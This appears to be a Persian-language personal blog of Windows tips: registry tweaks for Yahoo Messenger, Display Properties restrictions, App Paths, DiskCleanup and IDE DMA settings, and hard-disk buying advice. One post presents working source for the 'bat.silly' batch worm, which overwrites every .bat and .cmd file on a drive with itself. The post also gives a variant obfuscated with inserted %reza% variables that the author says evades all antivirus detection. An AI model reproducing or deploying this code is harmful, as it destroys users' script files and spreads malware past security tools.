computer
 

براي اينكار مراحل زير را به ترتيب انجام می دهيم

اول در Run تايپ می كنيم regedit  حالا مسير زير را طي كنيم

HKEY_CuRRent_User=>Software=>Yahoo=>Pager=>Test

حالا روي صفحه باز شده راست كليك كنيد و در قسمت New

DWORD Value را انتخاب می کنیم. اسمش را plural گذاشته و اینتر می کنیم

حالا plural را باز كرده و value data را به 1 تغییر داده و ok می کنیم. حالا هر چند تا مسنجر كه دوست داشته باشیم می توانیم باز کنیم

شنبه 17 اسفند 1392برچسب:, :: 18:59 ::  نويسنده : sajad

غیرفعال كردن برگه‌ها ( Tab ) در Display Properties وقتی بچه‌ها يا افراد ناوارد ياد می‌گيرند كه چگونه Disp Prp شكل و ظاهر سيستم را تغییر می‌دهد، گاهی وقت‌ها تغییرات نابجایی را در كامپیوترهایی كه مشترك هستند، ايجاد می‌كنند. می‌توانید با اضافه كردن یك متغیر در 

HKEY-CURRENT-USER Software Microsoft Windows CurrentVersion Policies System 
تغییرات پیكربندی Disp Prp را متوقف كنید. به تناسب مورد، یك مقدار DWORD ایجاد كنید و دادهِ آن را برابر با یك قرار دهیدبرگه‌های Themes ، Desktop ، ScreenSaver و Setting به ترتیب با مقادیری به نام NoThemesTab ، NoDispBackgroundPage ، NoDispScrSavPage وNoDispSettingsPage متوقف می‌شوند. مقدار NoDispAppearance هم برگهِ Themes و همAppearance را متوقف می‌كندمقدار NoDispCpl هم به طور كل، كادر Disp Prp را تعطیل می‌كند

جلوگیری از تغییر Background در IE وقتی روی تصویری راست كلیك كرده و گزینه‌ی Set as background را انتخاب می‌كنید، background تغییر می‌كند. برای جلوگیری از چنین كاری در كادر محاوره‌ای Run تایپ كنید Regedit و مسیر زیر را دنبال كنید

HKEY-CURRENT-USER Software Microsoft Windows CurrentVersion Policies ActiveDesktop 

و یك مقدار DWORD به نام NoChangingWallpaper ايجاد كنید و مقدار آن را یك قرار دهید. توجه داشته باشید این تنظیم فقط برای ویندوز XP است و حتما باید یك عكس را به عنوان Backgroundانتخاب كنید، نه گزینه‌ی None (ولا غیرنكته: نسخه‌ی پشتیبان از رجیستری يادتون نره ! 

اجرای برنامه از طریق كادر محاوره‌ای Run 
برنامه‌هایی مثل Regedit و Msconfig را می‌توان از طريق كادر محاوره ای Run و بدون نوشتن مسیر آن‌ها اجرا كرد. اما برای اجرای سایر برنامه‌ها، به این شکل، باید یك كلید به رجیستری اضافهكنیم. مسیر زیر را دنبال كنید
HKEY-LOCAL-MACHINE Software Microsoft Windows CurrentVersion Policies App Paths 

حالا یك كلید كه نام آن همان نام فایل اجرایی است، اضافه كنید. برای مثال Myprog.exe . مقدار آن‌را برابر آدرس كامل برنامه قرار دهید، در مثال ما C:Program FilesMyprogMyprog.exe .همچنین می‌بایست یك String Value ایجاد كنید كه آدرس آن فقط قسمتی از محل مورد نظر شماست كه در مثال ما این آدرس می‌باشد: C:Program FilesMyProg نكته: نسخه‌ی پشتیبان از رجیستری يادتون نره

توقف Compression ابزار DiskCleanup در پارتيشن‌های NTFS فایل‌های قدیمی را برای ایجاد فضای بیشتر فشرده می‌كند. امّــا محاسبه‌ی‌‌ ذخیره‌سازی و انجام عملیات فشرده‌سازی زمان زیادی طول می‌كشد و در بعضی موارد سیستم قفل می‌كند. اگر چنین اتفاقی می‌افتد و یا شما هم مثل من آدم صبوری نیستید، برای از كار انداختن Compression مسیر زیر را دنبال كنید:


HKEY-LOCAL-MACHINE Software Microsoft Windows CurrentVersion Explorer VolumeCaches Compress Old Files 
نكته: نسخه‌ی پشتیبان از رجیستری يادتون نره

امروزه بيشتر افراد از هاردهاي با ظرفيت بالا استفاده ميكنند. اگر شما يك هارد درايو IDE داريد ميتوانيد كاري كنيد كه بهترين كارايي را از آن داشته باشيد. همان طور كه ميدانيد اين هاردها ازدسترسي DMA پشتيباني ميكنند. DMA به هارد اين امكان را ميدهد كه در هنگام كار با برنامه هاي مختلف فشار كمتري به حافظه سيستم وارد آيد و قسمتي از هارد به كمك حافظه ميايد. با اين كار سرعت كار و كارايي هارد بسيار بالا ميرود همچنين فشار وارد بر CPU را نيز كاهش ميدهد. 
براي فعال كردن اين قسمت ابتدا وارد Device Manager شده و در ليست گزينه IDE ATA/ATAPI Controllers را انتخاب كنيد. سپس در زير شاخه آن گزينه Primary IDE Channel را انتخاب كنيد و روي آن دابل كليك كنيد. 
حال وارد قسمت Advanced Settings شده و در قسمت زير آن تنظيمات Device 0 و Device 1 را مشاهده كنيد. اگر جلوي Transfer Mode عبارت PIO Only نوشته شده بود از طريق ليست كشويي آن را به DMA if available تغيير دهيد و روي OK كليك كنيد. 
حال همين مراحل را براي Secondary IDE Channel نيز تكرار كنيد. سپس در صورت نياز سيستم خود را Restart كنيد. 
خيلي ها فكر ميكنند كه با انجام همين مراحل كار تمام ميشود. اما در اينجا يك نكته ظريف ديگر نيز وجود دارد كه بايد رعايت شود. در كانالهاي IDE قسمتي وجود دارد كه UDMA/66 ناميده ميشود. اين گزينه در حالت معمول غير فعال است. با فعال كردن اين قسمت ميتوان كارايي DMA را بسيار بيشتر كرد. براي فعال كردن اين قسمت مراحل زير را دنبال كنيد : 
ابتدا از طريق Run وارد Regedit شده و كليد زير را بيابيد : 

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4D36E96A-E325-11CE-BFC1-08002BE10318} 

سپس در صفحه سمت چپ به دنبال كليد EnableUDMA66 بگرديد و سپس به آن مقدار 1 را اختصاص دهيد. اگر وجود نداشت يك كليد از نوع DWORD به همان نام بسازيد و به آن مقدار 1 را براي فعال سازي اختصاص دهيد( براي غير فعال كردن ميتوانيد از مقدار 0 استفاده كنيد ) . فعال بودن اين قسمت كارايي هارد را بسيار افزايش ميدهد بنابراين توصيه ميكنم حتما اين كار را انجام دهيد.

شنبه 17 اسفند 1392برچسب:, :: 18:56 ::  نويسنده : sajad

طبق گفته kaspersky ،یکی از خطرناک ترین ویروس های bat (کرم نه ویروس)،ویروس bat.silly میباشد و تمام فایل های bat و cmd موجود در دیسکی که قرار دارد را به روش رونویسی آلوده میکند.

 

@echo off

@for /r \ %%a in (*.bat,*.cmd) do copy %0 %%a

 

کدهای زیر هم کدهای encrypt شده ویروس میباشد که آنتی ویروس ها آن را نمیشناسند:

 

%reza%@for /r \ %%a in (*.ba%reza%t,*.cmd) do co%reza%py %0 %%%reza%a

 

این هم از کدی که آنتی ویروس kaspersky میشناسه:

 

for %%a in (*.bat) do copy %0 %%a

 

 

کد سوم فقط فایل های bat موجود در پوشه جاری را آلوده میکند و کد دوم را هیچ آنتی ویروس نمیشناسد و همان کار کد اول را انجام میدهد.

شنبه 17 اسفند 1392برچسب:, :: 18:54 ::  نويسنده : sajad

 

.

هارددیسک بایستی بتواند تمام برنامه ها و اطلاعات شما را در خود جای دهد. خوشبختانه ظرفیت هارددیسک ها روز بروز بیشتر می شود و سرعت آنها نیز بالاتر می رودهنگام خرید کامپیوتر به هارد دیسک کمتر از ظرفیت 60 یا 80 گیگابایت راضی نشوید.

هر چه ظرفیت بالاتر باشد، بهتر است. برای سرعت هم امروزه 7200 دور در دقیقه (rpm) رایج است که مناسب می باشد. اگر خیلی کیفیت برایتان مهم است به دنبال هارددیسکی باشید که حداقل 8 مگابایت حافظه نهان (Cache) داشته باشد.

(توضیحات بیشتردر مورد اصطلاحات در سایر مقالات سایت میکرو رایانههارددیسک های جدیدتر که براساس استاندارد Serial ATA ساخته شده اند راحت تر مدیریت می شوند اما معمولا فقط در کامپیوترهای جدیدتر نصب می شوند.

در موقع خرید، بررسی هارددیسک کامپیوتر، آسان ترین و قابل فهم ترین کار است زیرا کافی است فقط دو پارامتر را بررسی کنید: ظرفیت و سرعت.

امروزه اکثر هارددیسک ها بر مبنای ظرفیت گیگا بایت (GB) سنجیده می شوند. معنی آن این است که هارددیسک فرمت شده حاوی ظرفیت بیلیون بایت است. توجه کنید که وقتی هارددیسک فرمت می شود، ظرفیت آن اندکی کمتر نشان داده می شود و این موضوع همیشه جای بحث بین خریدار و فروشنده بوجود می آورد! به هرحال هر چه این عدد کنار GB بزرگتر باشد، ظرفیت هارددیسک هم بیشتر است.
اکثر کامپیوترها با هارددیسک های با سرعت 7200 یا 5400 دور در دقیقه عرضه می شوند. هارددیسک های 5400 دور در دقیقه کندتر هستند. سرعت 7200 امروزه معمول است و عملکرد خوبی هم دارد.

درباره وبلاگ

به وبلاگ من خوش آمدید
آخرین مطالب
آرشيو وبلاگ
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان عشق و آدرس sajad3654.LXB.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان



نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 2
بازدید دیروز : 0
بازدید هفته : 2
بازدید ماه : 61
بازدید کل : 8623
تعداد مطالب : 12
تعداد نظرات : 0
تعداد آنلاین : 1



<-PollName->

<-PollItems->

.

.

ک

دریافت کد بستن راست کلیک در وبلاگ

دریافت کد بستن راست کلیک در وبلاگ